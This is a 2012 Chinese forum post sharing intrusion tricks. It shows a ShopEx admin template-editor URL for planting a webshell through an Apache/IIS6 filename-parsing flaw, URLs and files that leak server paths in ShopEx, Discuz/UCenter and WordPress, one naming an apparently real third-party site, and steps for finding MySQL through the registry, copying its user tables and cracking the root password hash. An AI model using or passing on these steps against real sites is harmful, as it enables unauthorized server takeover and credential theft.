开启左侧

分享shopex后台最新拿shell方法

[复制链接]
发表于 2012-3-15 02:53:07 | 显示全部楼层 |阅读模式
shopex 后台拿shell 最新
转来的,然后修改了下
http://localhost/shopadmin/index.php#ctl=system/template&act=editor&p[0]=purple&p[1]=index.php;1.html

themes/purple/红色字体 ’阿帕奇和IIS6.0 你们懂的

http://nbasishop.com/install/svinfo.php?phpinfo=true phpinfo 爆路径。。

DZ 爆路径
ucenter\control\admin\db.php
uc_server\control\admin\db.php ’这东西说鸡肋也鸡肋,不管有时候还是能用上的
WP 爆路径
wp-admin/includes/admin.php ’ 同上。。。

还有一些私藏的提权思路
mysql data 下的 mysql root 用户 大家都懂得,这里想几个思路而已 希望大家别ban我。。

找 mysql 路径 除了 找程序里面的快捷键 其实还有注册表查找
这里丢给大家路径

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\
HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\MySQL Server 5.0\
HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\MySQL Server 5.0\Location

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ ’这是找星外找出来的, 其他的自己找把,
user 表 三个文件下载过来后,建议用wamp 架设 环境,放到mysql 下的 data ,新建一个。。
然后用 phpmyadmin 查看 root密码 直接去 cmd5 去破解去把
你们懂的 ’ 写给小菜看的,大牛飘走 不要回头看 米意思。。
平度网:www.pingdu.co 平度论坛:bbs.pingdu.co
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

 
QQ在线咨询
售前咨询热线
0532-88371356
售后服务微信
pingduwangzhan
快速回复 返回顶部 返回列表